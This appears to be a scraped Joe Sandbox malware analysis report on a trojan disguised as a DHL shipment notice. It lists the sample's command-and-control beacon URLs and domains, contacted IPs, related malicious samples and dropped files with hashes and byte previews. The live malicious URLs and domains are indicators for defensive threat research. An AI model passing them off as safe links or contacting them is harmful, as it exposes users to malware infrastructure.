          http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh0%Avira URL Cloudsafe
          http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU0%Avira URL Cloudsafe
          http://www.ultrakill.xyz/0%Avira URL Cloudsafe
          http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx100%Avira URL Cloudmalware
          www.lgf7.com/amdf/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ghs.google.com
          		142.250.185.115
          		truefalse
            		high
            www.ultrakill.xyz
            		3.64.163.50
            		truetrue
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                www.rtpholywin99.com
                		unknown
                		unknowntrue
                  		unknown
                  www.keilaniclothing.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqhtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HUtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBxfalse
                    • Avira URL Cloud: malware
                    		unknown
                    www.lgf7.com/amdf/true
                    • Avira URL Cloud: malware
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.ultrakill.xyz/svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorDHL SHIPMENT NOTIFICATION 1146789443.exefalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      23.227.38.74
                      		shops.myshopify.comCanada
                      		13335CLOUDFLARENETUStrue
                      3.64.163.50
                      		www.ultrakill.xyzUnited States
                      		16509AMAZON-02UStrue
                      142.250.185.115
                      		ghs.google.comUnited States
                      		15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:626119
                      Start date and time: 13/05/202216:08:112022-05-13 16:08:11 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 58s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@9/4@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 59.5% (good quality ratio 54.6%)
                      • Quality average: 75.6%
                      • Quality standard deviation: 31.3%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 91
                      • Number of non-executed functions: 179
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      23.227.38.74SecuriteInfo.com.Variant.Jaik.72878.4306.exeGet hashmaliciousBrowse
                      • www.deohgy.com/x7fi/?XV=2dyPen_pHl_x&m8F=efZWEojGtW5iMNPlHYZjNMX3TooIlOlKc4xUQLu+Byk1UhcSsg7BIt1H1VqZN2xCIaIE
                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                      • www.thissunshinyday.com/d23n/?4hkPkHmh=oAxm1Jph1Tun0blpQJdjg/SK6qGfgZ8cpI/ch5tkgrqA0k0NKGF3+6K/eQ1LrU5D/cry&b2Jlwz=YnBDMHZpAzVXFjA
                      aSsc9zh1ex.exeGet hashmaliciousBrowse
                      • www.threads34.store/wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH
                      Potvrda ponude.exeGet hashmaliciousBrowse
                      • www.rematedeldia.com/euv4/?-Zkp3=RhL0S&3f8tLtj=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjFhXHrxoEt
                      2u2DWOubvh.exeGet hashmaliciousBrowse
                      • www.green-quality-isr.com/sm3g/?Ujlp=PMsZESdofcdfXXm7otNvxqMEGQjwc7ZgGC69D5HZtF2nNtkl2ZL5b/zciDReNSeLA9iJ&1b8X=vL0hT
                      WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                      • www.nelvashop.com/wn19/
                      New order for customer 99009141.xlsxGet hashmaliciousBrowse
                      • www.sundayscompany.online/s0r7/?zhiPpdk=ZOHcDS/VoRL8NhF+NTNMAieI0E4uHoviIdLvhZxnb0fT8sGuyHwnt94dFecSp4VbabNYLw==&C8udn=0fdDUL908dxl
                      Docs advice copy.exeGet hashmaliciousBrowse
                      • www.pmpboutique.com/gt53/?sX=fFHodkbaNDvdv7oiPDPBLvQa76oY89bN2/bpamu9khvKSLTpx9uxAAOQYYoTTn+sNUOP&9rN0g=iZRXo
                      SecuriteInfo.com.W32.AIDetectNet.01.21900.exeGet hashmaliciousBrowse
                      • www.rollingstrollers.com/nd04/?pV08qv=7nrXP8lxbd&5j=l1IJrOgng8yVltsGeGHnDln+8V/8o58rojbxcfWDQZIkck1PQu51S7LVlrT3qI/mW37I
                      NEW ORDER #00980.exeGet hashmaliciousBrowse
                      • www.originalflamehumidifier.com/hpmw/?NViP5Vq8=iTviYglo0CrHM7nbewykO+47tekiRS7eipmJHPQTDc0EORtNZSrxZa0rbY2iqpvX/Dc4&9rV0d=iZPtS0Sxdh
                      Yeni sipari#U015f _WJO-001.exeGet hashmaliciousBrowse
                      • www.sapinou.com/apju/?0L3d9=RBoufo6dMO3sAZ9NBTm7jUfApJp+q3UDH1aHOxBdXrjMN0ARdrEfPXnAjDDptZepWsu3rOBPGA==&EXYx=KHMt_Nnh3TmtEby0
                      PLIST8985.exeGet hashmaliciousBrowse
                      • www.tzbcollections.com/tee5/?6l=HZfyqkOMaxI86340C6FwN5PErLC/ISxm8OEl9G9ih0M/I9Nv7DNlFxXxbxXb6YKuESuU&zVqLWr=Td-LTVDP
                      dr053I4HK8.exeGet hashmaliciousBrowse
                      • www.hallowseason.com/s2q8/?DN90gFjp=IP27paXDDXneFHSCWmd6AadpeBEtcWEpI/OT+vwCmhsDApZt1gdbnCKmAuXyoF3orSGW&n6S8Hz=BR-Lut
                      payment.exeGet hashmaliciousBrowse
                      • www.innovarecic.com/3e9r/?Wh=/tL8uK1iYcuieaEf5cU8mJl/dtQi3x61n0Fc3d8s1MHNXfqkiyPTGpiXh5zgjr6DuccX&oD=0buD_D
                      Package.exeGet hashmaliciousBrowse
                      • www.huecoffeelab.com/dgi3/?Yzu=Tzrlu&Dxoxst4=4GksrGZOf+guZI86juSNVbt9fHjp+CYVC+E4DEfxavTVsSmUiF7MP5m3YT1xGyxeU6ZL
                      TT copy.exeGet hashmaliciousBrowse
                      • www.parodistluxuryroll.com/3e9r/?iN=phBSnzfT0OrRvvAc1bUs+nj/v6KkMPdyLuDpgQqQfe+aWD1qY8W5eoiNTx4qLe5jjI3m&WbThi=9rNp
                      tjAWVBvXzq.exeGet hashmaliciousBrowse
                      • www.barcsmeowhs.com/n6g4/?0ph=UPlpdlBX_TVp&6lsLUdv=1w4jSqFAIM3PyIMGrisyxcva3xEcjWVGQ0bEKW/rZTLUFB4/F+YZAlAS5ms2eLKh/lKy
                      Nueva cotizaci#U00f3n185225772.exeGet hashmaliciousBrowse
                      • www.pawpaw.one/g5so/?BpU=U6e0&2dYlX=W3lOabhr/pNtAnItWES52SBmmj+pOzg3gSlvcknfGJySoaBDkbtojN+l/8OxlrGc71XZ
                      invoice.exeGet hashmaliciousBrowse
                      • www.innovarecic.com/3e9r/?t0DHvhR=/tL8uK1iYcuieaEf5cU8mJl/dtQi3x61n0Fc3d8s1MHNXfqkiyPTGpiXh5zgjr6DuccX&9r6x=-ZWhe0N0vNqPiNAP
                      Confirmation Transfer Ref_MT103_002345689109920098.exeGet hashmaliciousBrowse
                      • www.starprofithondo.com/u2po/?7nyp=V6APwxQ&v6AhC=3gpkNdW1luQZSAngxQjDjY65LPWMTUZ3O1UAIkwSaH4jaTPWko/E3WysBz4axuQxDrf4

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      shops.myshopify.comSecuriteInfo.com.Variant.Jaik.72878.4306.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      http://www.saltysavage.comGet hashmaliciousBrowse
                      • 23.227.38.74
                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      aSsc9zh1ex.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      Potvrda ponude.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      iqM872r4iu.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      2u2DWOubvh.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                      • 23.227.38.74
                      New order for customer 99009141.xlsxGet hashmaliciousBrowse
                      • 23.227.38.74
                      Docs advice copy.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      SecuriteInfo.com.W32.AIDetectNet.01.21900.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      NEW ORDER #00980.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      Yeni sipari#U015f _WJO-001.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      PLIST8985.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      dr053I4HK8.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      payment.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      Package.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      TT copy.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      TehmqnET0C.exeGet hashmaliciousBrowse
                      • 23.227.38.74
                      tjAWVBvXzq.exeGet hashmaliciousBrowse
                      • 23.227.38.74

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      AMAZON-02USSistgXd6cLGet hashmaliciousBrowse
                      • 54.66.79.10
                      https://w2globaldata.cabildodeagayu.com/1/?e=d2FycmVuLnJ1c3NlbGxAdzJnbG9iYWxkYXRhLmNvbQ==Get hashmaliciousBrowse
                      • 108.157.4.48
                      https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fclt1412957.bmetrack.com%2fc%2fl%3fu%3dD806837%26e%3d13CFAE0%26c%3d158F5D%26t%3d1%26l%3d76C219A5%26email%3d3mp%252BnyqgFv7EE0RTVybkWXnlkRjLUbPe%26seq%3d1%23c2VydmljZS5kZXNrQG5vdmVuY2kuZnI%3d&c=E,1,g5KC7BfAYUNqH4iZ_hW3t_kZvUUVOqNRIxS9hB3FjTl9MzSqzDpEvv02MymvQWQQvDNFoOozcYQtiwJkD9OLjklDAneS9G_9H4VgmMj6TGF1OjFXnzcIlw,,&typo=1Get hashmaliciousBrowse
                      • 3.67.62.92
                      percarmGet hashmaliciousBrowse
                      • 52.89.144.94
                      https://znap.link/andrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.comGet hashmaliciousBrowse
                      • 13.224.198.52
                      9YdidmdpU7.exeGet hashmaliciousBrowse
                      • 3.142.81.166
                      https://r20.rs6.net/tn.jsp?f=001oz1azagslZ81flEkxXgs2g3SWRiYSVI7KLvslXPFYHpiSKl5P8n0JRyaTb053n1-IYmPdZzAeqzc8m1QqWhgBYanR5TxM8Pmp6lEt_CAet0tX8kv1LDJZxYM199gkyewzmUzjvOOGiQk0XAEDQr6vSBcDmqRIRKL&c=Ls_FXhJGmT-7dCWYrar2zAtHnYmvNhIhkZvg3gIMxkPDc7YmsXHD4A==&ch=H_DaN9CbHD7opQZZemXtv6GEfaRrLcSEIqSJA5_ukBfQogYXPuvtWA==Get hashmaliciousBrowse
                      • 18.141.24.24
                      https://u26328446.ct.sendgrid.net/ls/click?upn=gf7UAK8wJS-2BWx6fZj4G2BBvAXxCrA2QWWbvz9SWnpwmXvLMTPaN99mi1ZBUMP-2BrEiAOaUOWtFHirX2-2FaqHwVcuvGKIoFZdw2ZrFyiho4r4v3PNsivKCwkGIMrdnnILSN9ILJEdVpct7xrBE5lCL-2BDg-3D-3DEpbG_UnLuEmQf-2FCMnLuK0HMUXSQv-2BgNUV902vD7oTziBuxkn3xNqdxDTK2qGWbBYWJ2JI0-2FXbwXRJkRbeTt6C-2BjjpEYXYCrMbmvTKGZRGNGG180-2Bi7-2BpLKXcKmukyb5F5Ei77lgNqot1X0x4LwTq-2FdwuTm6gdpP0YUsdKBpouRVOcTO5LmSRoqQ1olXsz161ESlbQ9BFINQb8ygMaG55OQWhjASnHp5JE2PLJCqk75-2F4jb0Q-3DGet hashmaliciousBrowse
                      • 52.222.174.83
                      https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=Get hashmaliciousBrowse
                      • 65.9.63.90
                      https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=Get hashmaliciousBrowse
                      • 108.157.4.80
                      https://sharingonlinepdf.simplesite.com/Get hashmaliciousBrowse
                      • 13.224.198.129
                      https://myubi.tvGet hashmaliciousBrowse
                      • 76.223.111.18
                      https://rp.mockplus.com/run/w3scV0nBNq/-GGeKIBoQs?cps=expand&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 52.218.176.129
                      https://rp.mockplus.com/run/lKCblaEtM9/uLRX_Tg7XZ?cps=collapse&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 54.230.96.42
                      Https://rp.mockplus.com/run/lKCblaEtM9/uLRX_Tg7XZ?cps=collapse&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 13.248.176.215
                      https://sync.crwdcntrl.net/map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=62553350917825036762023184708005776201?https%3A%2F%2Fsign-smpu724eb7r29qzs1gw162nd2cilb0gppxkyfq3q1rk.website%E2%80%8B.yandexcloud.net%23dbrodie@standrew.co.ukGet hashmaliciousBrowse
                      • 52.30.140.199
                      http://trk.mocka.co.nz/ls/click?upn=eCZBEmQvD6uDgCc-2FT-2FpqqKNd8-2BmC0SdCRaUuYELUnbx-2B5YaxqYHhw6gVFl7xLCp8SLLk-2BRQ4orrOW7JEkux6cwfaf5RZaIfhW7wIc0nDRJ3k7w54-2FQxPR5a9-2B7BKV-2Boywv2iY-2B602R2j6AgE5mHZvCRQ-2Bj-2B-2FOyU9LkIM1S0N-2FftI4kAfuxjxzc1RdrZL5c7pEIt5a5QU-2BqMO-2FsYkVseqsCmdoPWx3eVzIxF5PdE-2FEGeCTezZPTlElMbJ1SM7jalXYCP5-2FdWsyAJYFxIv-2B0nPedgVOa-2FQY7V1HpWisZ1nrJg9otVDcUwNpdeZbR1GksLYc47aeJHBO2tsJ-2BYFbQ7OSA-3D-3D_4FP_tujpWh3b734P-2Frq4hFPWR-2FNELU3GikvCFzJozbD11Y1kbWJkFcaCkx67X17NTp7DA0bwB1B1DkHwzWD-2BVa56jeG0WkCJwKbTionezrwwZcXg0VpWRoB6yiz-2BtSYUXIDxVYNKzHhVyxJjKq-2BB8IyvP5WUgdEShHNZ27X3SmILgXRN2abCw2GHkLTa-2B7kVL1pKgqSHvhUwe97rMk0jGoVUPyW7WJivjpcRfMoc-2BcF4LtD-2FVI-2F8CO-2F-2FOS-2FWXoDOC83mnMV-2FLz0ibl-2BWg-2FZQ5iMykfAYgbTK83e-2Bv4p3MUwQm1wl9gZunJiw41mjaibzNzsv23866Fvo9ryQuR6Q7z6b6EB6gFzZZoiv5QCaVhksmqaA9e0HHS-2F6Pff2yNkf8XFh4NYaNcHrdlgckDppLA0fbWYvfxWdfCKqdQRKFpb-2F2-2Fs-3DGet hashmaliciousBrowse
                      • 54.79.10.95
                      New Order No. 6353526728.exeGet hashmaliciousBrowse
                      • 18.185.231.132
                      SOA.exeGet hashmaliciousBrowse
                      • 3.64.163.50
                      TL0560231274.exeGet hashmaliciousBrowse
                      • 3.68.158.237
                      CLOUDFLARENETUShttps://w2globaldata.cabildodeagayu.com/1/?e=d2FycmVuLnJ1c3NlbGxAdzJnbG9iYWxkYXRhLmNvbQ==Get hashmaliciousBrowse
                      • 104.18.11.207
                      https://znap.link/andrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.comandrea.selmo-michell.comGet hashmaliciousBrowse
                      • 104.17.25.14
                      Payment Remittance098.htmlGet hashmaliciousBrowse
                      • 104.18.11.207
                      DENUNCIA IMPUESTA EN SU CONTRA.exeGet hashmaliciousBrowse
                      • 162.159.129.233
                      https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=Get hashmaliciousBrowse
                      • 104.18.11.207
                      https://w2globaldata.cabildodeagayu.com/1/?e=bGVzLmZyZWVsYW5kQHcyZ2xvYmFsZGF0YS5jb20=Get hashmaliciousBrowse
                      • 104.18.11.207
                      https://0365.myportfolio.com/Get hashmaliciousBrowse
                      • 162.247.243.146
                      https://cremodom.cf/mansion/#talia.bleakley@foster-gamko.comGet hashmaliciousBrowse
                      • 104.18.11.207
                      INV_660100.xlsxGet hashmaliciousBrowse
                      • 104.18.6.145
                      INV_660100.xlsxGet hashmaliciousBrowse
                      • 104.18.6.145
                      https://myubi.tvGet hashmaliciousBrowse
                      • 104.20.184.68
                      https://gusty-legal-49c.notion.site/ALEXANDRINE-Murielle-vous-a-donn-acc-s-un-document-s-curis-e6cb364f5c694f18886d3c64a9da56b2Get hashmaliciousBrowse
                      • 104.17.24.14
                      https://rp.mockplus.com/run/w3scV0nBNq/-GGeKIBoQs?cps=expand&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 104.17.24.14
                      https://rp.mockplus.com/run/lKCblaEtM9/uLRX_Tg7XZ?cps=collapse&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 188.114.96.10
                      Https://rp.mockplus.com/run/lKCblaEtM9/uLRX_Tg7XZ?cps=collapse&rps=collapse&nav=1&ha=0&la=0&fc=0&out=1&rt=1Get hashmaliciousBrowse
                      • 188.114.96.10
                      https://sync.crwdcntrl.net/map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=62553350917825036762023184708005776201?https%3A%2F%2Fsign-smpu724eb7r29qzs1gw162nd2cilb0gppxkyfq3q1rk.website%E2%80%8B.yandexcloud.net%23dbrodie@standrew.co.ukGet hashmaliciousBrowse
                      • 104.17.24.14
                      https://securepubads.g.doubleclick.net/pcs/view?adurl=https%3a%2f%2fquzqvm.codesandbox.io?dg=cHJ6ZW15c2xhdy5rcmF3Y3p5a293c2tpQG1hZXJza2RyaWxsaW5nLmNvbQ==Get hashmaliciousBrowse
                      • 104.18.11.207
                      SecuriteInfo.com.W32.AIDetectNet.01.9735.exeGet hashmaliciousBrowse
                      • 188.114.97.10
                      http://trk.mocka.co.nz/ls/click?upn=eCZBEmQvD6uDgCc-2FT-2FpqqKNd8-2BmC0SdCRaUuYELUnbx-2B5YaxqYHhw6gVFl7xLCp8SLLk-2BRQ4orrOW7JEkux6cwfaf5RZaIfhW7wIc0nDRJ3k7w54-2FQxPR5a9-2B7BKV-2Boywv2iY-2B602R2j6AgE5mHZvCRQ-2Bj-2B-2FOyU9LkIM1S0N-2FftI4kAfuxjxzc1RdrZL5c7pEIt5a5QU-2BqMO-2FsYkVseqsCmdoPWx3eVzIxF5PdE-2FEGeCTezZPTlElMbJ1SM7jalXYCP5-2FdWsyAJYFxIv-2B0nPedgVOa-2FQY7V1HpWisZ1nrJg9otVDcUwNpdeZbR1GksLYc47aeJHBO2tsJ-2BYFbQ7OSA-3D-3D_4FP_tujpWh3b734P-2Frq4hFPWR-2FNELU3GikvCFzJozbD11Y1kbWJkFcaCkx67X17NTp7DA0bwB1B1DkHwzWD-2BVa56jeG0WkCJwKbTionezrwwZcXg0VpWRoB6yiz-2BtSYUXIDxVYNKzHhVyxJjKq-2BB8IyvP5WUgdEShHNZ27X3SmILgXRN2abCw2GHkLTa-2B7kVL1pKgqSHvhUwe97rMk0jGoVUPyW7WJivjpcRfMoc-2BcF4LtD-2FVI-2F8CO-2F-2FOS-2FWXoDOC83mnMV-2FLz0ibl-2BWg-2FZQ5iMykfAYgbTK83e-2Bv4p3MUwQm1wl9gZunJiw41mjaibzNzsv23866Fvo9ryQuR6Q7z6b6EB6gFzZZoiv5QCaVhksmqaA9e0HHS-2F6Pff2yNkf8XFh4NYaNcHrdlgckDppLA0fbWYvfxWdfCKqdQRKFpb-2F2-2Fs-3DGet hashmaliciousBrowse
                      • 104.17.24.14
                      https://tmsteels.dotling.com/Get hashmaliciousBrowse
                      • 188.114.96.10

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\1f1tfctqz7e9

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):189439
                      Entropy (8bit):7.991246452644623
                      Encrypted:true
                      SSDEEP:3072:nSqfxKHsiwZNRIuqSFpjwuq/D7YfJs8N8p321SwWvM0rscdXjQ4sHnOBfoXdpz4O:nxfxAwWS39q6JsM8U1dWvo+XjZ6dpz8I
                      MD5:5C1283288CC16D3EAAFFF3A0C53CB189
                      SHA1:15804A12C0184AC1F12B053B9640326E1D865F92
                      SHA-256:321FDA60076CDB1D552492333599861F583B01A2F3774F84B3991EE58036AE4F
                      SHA-512:A7FD921DEC02CFFD94AF98CCC8964FEE343BF22DD541939685E85955AC6CC14EEAF661438DFD8B4F45B1852259C98C8BA153D322760F0D033C761B7382A32B9D
                      Malicious:false
                      Reputation:low
                      Preview:.y.oJ_.....{.:./..i.I..i..,|..-..A<...-..VK].M...,....R{._\.D....o...L....Gs.. ..S[..n~.]..?..G...t.X....I.)O..B..P,<.;=..:lj.\*(......C..?.5..>}+.]...WU....|4..a...T.".d....8G9(<.#9...X.......Q.+...%.v..d......z.-.y...<...%c"^.:...=...7..EGE.Z....._..S...2(...i.........Sm.-..A<J..-..V.].M...0....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d.....Zs.#.#96.X....#.HwQU+...%.n.M..'.s}ob.-.y...<.B]%cF^.:..=..7..EG..Z..H.._...S...2(.E.i.........S..-..A<...-..VK].M...,....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d....8G9(<.#9#..X....#z.wQ.+...%.n.M..'..}oz.-.y...<.B]%cF^.:..=..7..EG..Z..H.._...S...2(.E.i.........S..-..A<...-..VK].M...,....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d....8G9(<.#9#..X....#z.wQ.+...%.n.M..'..}oz.-.y...<

                      C:\Users\user\AppData\Local\Temp\aeokw.exe

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):80384
                      Entropy (8bit):6.294435627366989
                      Encrypted:false
                      SSDEEP:1536:GuTaC+v1M4fr0oxAomP3cX/4pi2sWjcdxpI:Pa524D1/ui5xy
                      MD5:6F70881E0183CE9F78E300CF2C8DC48E
                      SHA1:D2D766CB5654AA367682C41FBC177A146D047D2C
                      SHA-256:D3AFB887DFF82AA5A52C4AD2008DAC9126B854EA2E3EFC729AB27CFAFABA39C2
                      SHA-512:6C5FE5B2A594606B26E5E4D2E05995EB39CC25C0B461AD2882503D45E7705524A6EA9A2E99CB76FB2FFFC0DD992AE1F43153C29ED3E5B98ED68F85EF74807208
                      Malicious:true
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...+.}b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\fnnok

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4986
                      Entropy (8bit):6.153505769820207
                      Encrypted:false
                      SSDEEP:96:2JQ3L3rEeKzJzFuuvSKQZ8LFVmhJMYLX2lGNfvw7w4Ihl4FELbgTht7:3wnthuuKKGIchJMYLX2lGSIhl4egThp
                      MD5:F10D9B65FF4DE8235C81704DF991DD2A
                      SHA1:543635DE72F333E9CF19CBA7B0DE572C33AB0E43
                      SHA-256:E9A70DEEF4CDAD4801C117EA5FAF227EFF7026ADBADF19FCC1DEA95674A8E3A0
                      SHA-512:237666835BF885924CFDF5955F6D1583269EE070C9A69EA3835C06A1C60EDDAEC8A19265CB1ED13035F44E335D161B22B0266D1F0F8855E6C0996E425699BD61
                      Malicious:false
                      Reputation:low
                      Preview:.5911.....q.....!1@..@Dv.@..@Dv...)1.v-Y111..%10.=0.A.v)..,111.v....0.=0.A.v)...111.v....0.=0.A.v)...111.v....0.=0.A.v)...111.v....A5.k.9...44v=.v.....vA..5d..v..~..v..~-.5.d..A.(".v.4.-.5.v-....%..!.d.1111.5U6.\.-0...0...0..r.0..r.0...0....'.A.y.=(.y.}%Q..2.!0..r..v9@6.v!4.-.1111.uU5T111.5U>...%...v!.....=1.....@..@Dv).v9.1lv=.Q.v9.1.~A.E.u.5..).v-.v9.1q.~9.2.v)..-..=1.G+....311..311.E1..0....311..311.91.>....311.u311.91.....Y@..@Dv..v)A111.v..v-..)1.G.v-.11.v-q.v-.v)y.v)...y611..w.v9.9...1.u>...>..v..9...1.u>...>..3.9...1.u6....0....211....00.v%.@.v..0.9.{000.v%..%1.7..!1.8.v!2111.v!..51.....q@..@Dv..v)Y111.v.v-..)1.G.v-.11.v-q.v-.v)y.v)....511..@..111.v9.9...1.u>.>..v=.9...1.u>.>..vA.9....u>.>..vEd..9...4.uF.}F..v..9...3.u>.>..6.9...1.u6.G+....111...-00.v%..I1.9.v..~I.2.H0.I0.E0.A0.=0.9.j/00.v%..%1.7..!1.8.v!2111.v!..E1.....M.v)A111.v..v-..)1.G.v-.11.v-q.v-.v)y.v)....411..w.v9.9...1.u>...>..v=.9...1.u>...>..3.9...1.u6...>...V111..]-00.v%.?0.=0.9...0

                      C:\Users\user\AppData\Local\Temp\nsk2671.tmp

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289971
                      Entropy (8bit):7.540713997849172
                      Encrypted:false
                      SSDEEP:6144:JxfxAwWS39q6JsM8U1dWvo+XjZ6dpz89BY2LZwAOuu28u:J/UQlr8sdijQD89LZwSu2J
                      MD5:CD439B40B1EE8F92D024EE3F27772BB3
                      SHA1:8276D5F64B59E97CC2A965B11634FB5CA6454548
                      SHA-256:7DF3145A379DFF6BAE9572B07B4F208AF2ECEA35457A79E3AF440C6C254E3A11
